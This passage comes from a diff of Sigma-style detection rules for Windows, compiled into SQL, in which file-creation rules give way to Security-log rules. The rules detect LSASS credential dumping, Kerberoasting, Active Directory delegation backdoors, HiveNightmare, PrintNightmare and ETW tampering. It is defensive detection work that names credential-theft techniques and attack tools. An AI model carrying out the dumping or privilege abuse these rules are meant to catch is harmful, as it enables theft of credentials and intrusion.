"win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": 
"Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it 
builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName 
LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE 
'%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) 
AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE 
'%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": 
"win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' 
ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a 
suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": 
"HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with 
PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' 